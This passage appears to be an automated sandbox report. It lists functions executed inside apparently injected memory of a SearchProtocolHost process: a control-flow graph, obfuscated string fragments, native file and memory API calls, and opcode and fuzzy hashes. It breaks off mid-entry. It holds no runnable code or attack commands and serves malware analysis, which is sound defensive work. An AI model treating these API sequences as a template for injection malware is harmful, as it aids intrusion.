                                                                                  Executed Functions

                                                                                  Function 02A19EA0 Relevance: 36.7, Strings: 29, Instructions: 463COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 27 2a19ea0-2a1a328 28 2a1a339-2a1a345 27->28 29 2a1a347-2a1a350 28->29 30 2a1a35d-2a1a36e 28->30 31 2a1a352-2a1a355 29->31 32 2a1a35b 29->32 33 2a1a37f-2a1a388 30->33 31->32 32->28 35 2a1a38a-2a1a39d 33->35 36 2a1a39f-2a1a3b0 33->36 35->33 38 2a1a3c1-2a1a3cd 36->38 39 2a1a3e3 38->39 40 2a1a3cf-2a1a3e1 38->40 42 2a1a3ea-2a1a3f3 39->42 40->38 43 2a1a775-2a1a77c 42->43 44 2a1a3f9-2a1a403 42->44 46 2a1a7b2-2a1a7b9 43->46 47 2a1a77e-2a1a789 43->47 45 2a1a414-2a1a420 44->45 48 2a1a433-2a1a43d 45->48 49 2a1a422-2a1a431 45->49 52 2a1a874-2a1a87e 46->52 53 2a1a7bf call 2a3b3d0 46->53 50 2a1a790-2a1a7b0 47->50 51 2a1a78b-2a1a78f 47->51 55 2a1a44e-2a1a45a 48->55 49->45 50->43 51->50 56 2a1a88f-2a1a89b 52->56 58 2a1a7c4-2a1a7ce 53->58 59 2a1a471-2a1a47b 55->59 60 2a1a45c-2a1a46f 55->60 61 2a1a8b1-2a1a8bb 56->61 62 2a1a89d-2a1a8af 56->62 63 2a1a7df-2a1a7eb 58->63 66 2a1a48c-2a1a498 59->66 60->55 62->56 67 2a1a801-2a1a80d 63->67 68 2a1a7ed-2a1a7ff 63->68 69 2a1a49a-2a1a4ad 66->69 70 2a1a4af-2a1a4b9 66->70 71 2a1a832-2a1a83c 67->71 72 2a1a80f-2a1a830 67->72 68->63 69->66 75 2a1a4bb-2a1a4d8 70->75 76 2a1a4da-2a1a4ed 70->76 77 2a1a84d-2a1a856 71->77 72->67 75->70 78 2a1a4fe-2a1a50a 76->78 77->52 81 2a1a858-2a1a864 77->81 79 2a1a51d-2a1a52c 78->79 80 2a1a50c-2a1a51b 78->80 83 2a1a672-2a1a67c 79->83 84 2a1a532-2a1a539 79->84 80->78 85 2a1a872 81->85 86 2a1a866-2a1a86c 81->86 89 2a1a6b4-2a1a6be 83->89 90 2a1a67e-2a1a698 83->90 87 2a1a570-2a1a574 84->87 88 2a1a53b-2a1a56e 84->88 85->77 86->85 92 2a1a576-2a1a59b 87->92 93 2a1a59d-2a1a5a7 87->93 88->84 96 2a1a6cf-2a1a6db 89->96 94 2a1a69a-2a1a69e 90->94 95 2a1a69f-2a1a6a1 90->95 92->87 97 2a1a5b8-2a1a5c4 93->97 94->95 98 2a1a6a3-2a1a6ac 95->98 99 2a1a6b2 95->99 100 2a1a6dd-2a1a6ec 96->100 101 2a1a6ee-2a1a6f8 96->101 104 2a1a5e2-2a1a5ec 97->104 105 2a1a5c6-2a1a5d2 97->105 98->99 99->83 100->96 102 2a1a709-2a1a715 101->102 106 2a1a717-2a1a720 102->106 107 2a1a72d-2a1a734 102->107 110 2a1a5fd-2a1a609 104->110 108 2a1a5e0 105->108 109 2a1a5d4-2a1a5da 105->109 111 2a1a722-2a1a728 106->111 112 2a1a72b 106->112 113 2a1a766-2a1a770 107->113 114 2a1a736-2a1a764 107->114 108->97 109->108 116 2a1a619-2a1a623 110->116 117 2a1a60b-2a1a617 110->117 111->112 112->102 113->42 114->107 118 2a1a626-2a1a62f 116->118 117->110 121 2a1a631-2a1a643 118->121 122 2a1a645-2a1a64c 118->122 121->118 123 2a1a66d 122->123 124 2a1a64e-2a1a66b 122->124 123->43 124->122
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: [$ Z$"|$%$(w$)$1$56f3$H$Hm$K$N\$Qj$OR4"|$R4"|$]$a$d$d9$f3$hy$j$lj$m=hy$n$o$q$v$z$}
                                                                                  • API String ID: 0-4081740624
                                                                                  • Opcode ID: 5b197d86c05f4fcf2ca58b3b03804c3ae91e292cb6a0b5b42f5b150e846c12e9
                                                                                  • Instruction ID: 2979a7934da80d5fecfae83c9131633d1b7dc2f7ab861eb72927ec2bc68d09d5
                                                                                  • Opcode Fuzzy Hash: 5b197d86c05f4fcf2ca58b3b03804c3ae91e292cb6a0b5b42f5b150e846c12e9
                                                                                  • Instruction Fuzzy Hash: 71427DB0906229CBEB64CF44C998BDDBBB2BB45318F1081DAC54D7B281CBB55AC9CF50
                                                                                  Function 02A2C860 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 02A2C938
                                                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 02A2C973
                                                                                  • FindClose.KERNELBASE(?), ref: 02A2C97E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                  • String ID:
                                                                                  • API String ID: 3541575487-0
                                                                                  • Opcode ID: d89848fe7256e9ce5e025eda469e0519624b9d75b2f5e6b32e4613596c328191
                                                                                  • Instruction ID: 2d43667a95d4fec710aa526acf11e11ddaed6891c66d357a340cc8261b8b1fec
                                                                                  • Opcode Fuzzy Hash: d89848fe7256e9ce5e025eda469e0519624b9d75b2f5e6b32e4613596c328191
                                                                                  • Instruction Fuzzy Hash: E03190B1940218BBDB21EFA8CC85FAE777EDF44755F144599B908A7180DF70AA848FA0
                                                                                  Function 02A393A0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02A394A1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: d55cf91759196bf18ac3fda808b7da1411fa9cc5a05f4d33fcbe879a96a2afb3
                                                                                  • Instruction ID: 837e5460e9bf69099afcb659bdb450eb0ddbb77543f2425ae8fc710ac165c788
                                                                                  • Opcode Fuzzy Hash: d55cf91759196bf18ac3fda808b7da1411fa9cc5a05f4d33fcbe879a96a2afb3
                                                                                  • Instruction Fuzzy Hash: C831C3B5A01248AFCB14DF99D881EDFB7B9EF88314F108219F918A3340D770A9518FA5
                                                                                  Function 02A39510 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02A395F9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID:
                                                                                  • API String ID: 2738559852-0
                                                                                  • Opcode ID: 008ae1cd979c5dd922d3da6ceb314d723fd3473bbf4367fba8781d2feef65871
                                                                                  • Instruction ID: 0bbd52a3a44c776e332afc9a28ff88789f45400b03b5e6ad801fbf40f05a353e
                                                                                  • Opcode Fuzzy Hash: 008ae1cd979c5dd922d3da6ceb314d723fd3473bbf4367fba8781d2feef65871
                                                                                  • Instruction Fuzzy Hash: 7931C7B5A00208AFDB14DF99D881EEFB7B9EF88714F108619F918A7340D770A911CFA5
                                                                                  Function 02A39820 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtAllocateVirtualMemory.NTDLL(02A22088,?,02A3816F,00000000,00000004,00003000,?,?,?,?,?,02A3816F,02A22088,10458B0C,02A22088,00000000), ref: 02A398E8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateMemoryVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2167126740-0
                                                                                  • Opcode ID: d35709bc92f01a1c6c3088e0d00430d9e238462b21be05e3067fd54b4be63693
                                                                                  • Instruction ID: c8dc80bbcae8903daabb5bcb55d38891fa5b6747690d5a79e33fdf16874a4908
                                                                                  • Opcode Fuzzy Hash: d35709bc92f01a1c6c3088e0d00430d9e238462b21be05e3067fd54b4be63693
                                                                                  • Instruction Fuzzy Hash: 19212BB5A00249AFDB14DF98DC81EEFB7B9EF88714F008509F958A7240D770A911CFA1
                                                                                  Function 02A39610 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: DeleteFile
                                                                                  • String ID:
                                                                                  • API String ID: 4033686569-0
                                                                                  • Opcode ID: a16a95abcbffbf5d145a8d9bc3aaada73f347d3dc5252d097396534119c79234
                                                                                  • Instruction ID: ab2240ca236c5b194a8df2b62d60ece1b4cff9bd5584f0943b719aa25f218865
                                                                                  • Opcode Fuzzy Hash: a16a95abcbffbf5d145a8d9bc3aaada73f347d3dc5252d097396534119c79234
                                                                                  • Instruction Fuzzy Hash: 9111A0B1640248BFD720EBA5CC01FAFB76DEF84714F008509FA5867280DB717A118BA1
                                                                                  Function 02A396B0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02A396E4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_2a10000_SearchProtocolHost.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: 0972272d2523aad39672e0d6cd6478e3c5c68d2fec25f3726e41a2152dbfdc4c
                                                                                  • Instruction ID: f5f43d8b81ca527a069b396dbcaddf0830fdf5a1e9593a6cef2abf731a4a26e2
                                                                                  • Opcode Fuzzy Hash: 0972272d2523aad39672e0d6cd6478e3c5c68d2fec25f3726e41a2152dbfdc4c
                                                                                  • Instruction Fuzzy Hash: ECE08C362502147BC620FAAACC01FAB776DEFC5B64F01451AFA5CA7242DB71B9018BF1
                                                                                  Function 03244340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 3b38e680b0c781a45fd62bec22b8f6aeb5f8e1d680722204f4b9f2faecc05ef3
                                                                                  • Instruction ID: dd9d2626e92d2447bb93b1d9e4bffaef2d980ad7072fa40318620100c982f014
                                                                                  • Opcode Fuzzy Hash: 3b38e680b0c781a45fd62bec22b8f6aeb5f8e1d680722204f4b9f2faecc05ef3
                                                                                  • Instruction Fuzzy Hash: C4900231715804129140B1584884546400597E0301B55C011F5424554C8B648B965761
                                                                                  Function 03244650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 609dcf1f351726d1a337a19f54329a3731f3cec27249e0b9c927e1c578d215b1
                                                                                  • Instruction ID: 4f250cd7180f8503b9f85d75f9c68d43453562476238139d5c3bf96301ddba0b
                                                                                  • Opcode Fuzzy Hash: 609dcf1f351726d1a337a19f54329a3731f3cec27249e0b9c927e1c578d215b1
                                                                                  • Instruction Fuzzy Hash: A7900271711504424140B1584804406600597E1301395C115B5554560C87688A959669
                                                                                  Function 03242B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: fd0f674afcea378f25833ee5fb0ecc3d596cdc4e61fa969cc5f6fdd86bc1f4e5
                                                                                  • Instruction ID: 4e3e4114e55444dce91c550c2f6b4a25375e0883c0e583b24c77a8adf4e9d91f
                                                                                  • Opcode Fuzzy Hash: fd0f674afcea378f25833ee5fb0ecc3d596cdc4e61fa969cc5f6fdd86bc1f4e5
                                                                                  • Instruction Fuzzy Hash: D0900271312404034105B1584414616400A87E0201B55C021F6014590DC6758AD16525
                                                                                  Function 03242BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 19f90351bcf42573a42b1855ce209183cfdc735c153e16a63962cb27191f13fd
                                                                                  • Instruction ID: 753d215023843e038f85d311c1d12aba3d418e985333c924840d39fcf8ba6f09
                                                                                  • Opcode Fuzzy Hash: 19f90351bcf42573a42b1855ce209183cfdc735c153e16a63962cb27191f13fd
                                                                                  • Instruction Fuzzy Hash: 3290023171540C02D150B1584414746000587D0301F55C011B5024654D87A58B957AA1
                                                                                  Function 03242BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: f09f8ac39492bbf378f391dc57da432c2128327b82617779b6d71d4034e51624
                                                                                  • Instruction ID: 0389df6740a53e31ddb4d7f0498665e4889116ee7b6a553e30ce3a6011826fed
                                                                                  • Opcode Fuzzy Hash: f09f8ac39492bbf378f391dc57da432c2128327b82617779b6d71d4034e51624
                                                                                  • Instruction Fuzzy Hash: 5890023131544C42D140B1584404A46001587D0305F55C011B5064694D97758F95BA61
                                                                                  Function 03242BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 393c19e012f09d22569c3505f8c65fcaa4e3d6b390df730d22de5d6e4be4eeaf
                                                                                  • Instruction ID: ebb11fa53271425aee0aec2363155b43cdf654d741c258e139fdc19ab403caee
                                                                                  • Opcode Fuzzy Hash: 393c19e012f09d22569c3505f8c65fcaa4e3d6b390df730d22de5d6e4be4eeaf
                                                                                  • Instruction Fuzzy Hash: A490023131140C02D180B158440464A000587D1301F95C015B5025654DCB658B997BA1
                                                                                  Function 03242AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 44b5a518f80a01d4e44428ced71578224fa561a99c74095568c3bd571cfeb8f4
                                                                                  • Instruction ID: b7440c7756955b73cde8e1a44025705b456f9d8274ea523a77aa344de516e7f0
                                                                                  • Opcode Fuzzy Hash: 44b5a518f80a01d4e44428ced71578224fa561a99c74095568c3bd571cfeb8f4
                                                                                  • Instruction Fuzzy Hash: 04900235331404020145F558060450B044597D6351395C015F6416590CC7718AA55721
                                                                                  Function 03242AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 01ea567c800279a045aa7ca577a8c8f0213faf799fd2811acec1868fc58b81a7
                                                                                  • Instruction ID: 32de139639f655f3913c5eeff32f46b642f19b10df0f1a9b31dd4787798187fb
                                                                                  • Opcode Fuzzy Hash: 01ea567c800279a045aa7ca577a8c8f0213faf799fd2811acec1868fc58b81a7
                                                                                  • Instruction Fuzzy Hash: 6A900435331404030105F55C07045070047C7D5351355C031F7015550CD771CFF15531
                                                                                  Function 03242F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: fa629d8b53157763b596cb32e2ed870497d6b74b1c011329cd8149fb27b80024
                                                                                  • Instruction ID: eb077349ba6e682aa7d7ffb5e4e8640298ae01c12122a90c749804deb11043e8
                                                                                  • Opcode Fuzzy Hash: fa629d8b53157763b596cb32e2ed870497d6b74b1c011329cd8149fb27b80024
                                                                                  • Instruction Fuzzy Hash: A890027135140842D100B1584414B060005C7E1301F55C015F6064554D8769CE926526
                                                                                  Function 03242FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 40086aa0af5b2bef295cbce5dd2ce47e4a57a3ff1c862b44eb91c51bab8e8883
                                                                                  • Instruction ID: 368ef27aa820f2004321d0c903b4163b85eb161bb47c4750f7f9d2030b771f82
                                                                                  • Opcode Fuzzy Hash: 40086aa0af5b2bef295cbce5dd2ce47e4a57a3ff1c862b44eb91c51bab8e8883
                                                                                  • Instruction Fuzzy Hash: F8900231711404424140B16888449064005ABE1211755C121B5998550D86A98AA55A65
                                                                                  Function 03242FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 0f974bcb4c88233e130fc50132d41fc9bf7dabd2c7f3002088012f75e879549d
                                                                                  • Instruction ID: ba1eedd22472dc7a6e4ea2b55a6bbfa0143c00c58e123a311ad06f876e3e8410
                                                                                  • Opcode Fuzzy Hash: 0f974bcb4c88233e130fc50132d41fc9bf7dabd2c7f3002088012f75e879549d
                                                                                  • Instruction Fuzzy Hash: 3F900231321C0442D200B5684C14B07000587D0303F55C115B5154554CCA658AA15921
                                                                                  Function 03242E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 4711153be5705901c2d7e0cacaa7651bf4ccaf742d57586e5b6e86b443b67f34
                                                                                  • Instruction ID: adb296ddbbc51ad69deaa119f4c650ce2e755076ca0e5cf4ebb41f819bb6b7e6
                                                                                  • Opcode Fuzzy Hash: 4711153be5705901c2d7e0cacaa7651bf4ccaf742d57586e5b6e86b443b67f34
                                                                                  • Instruction Fuzzy Hash: 7390023171140902D101B1584404616000A87D0241F95C022B6024555ECB758BD2A531
                                                                                  Function 03242EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031D0000, based on PE: true
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.00000000032FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_31d0000_SearchProtocolHost.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 400530205d2f2961724624f4ae92a75061138e33764b30bd387acbc83cf561cd
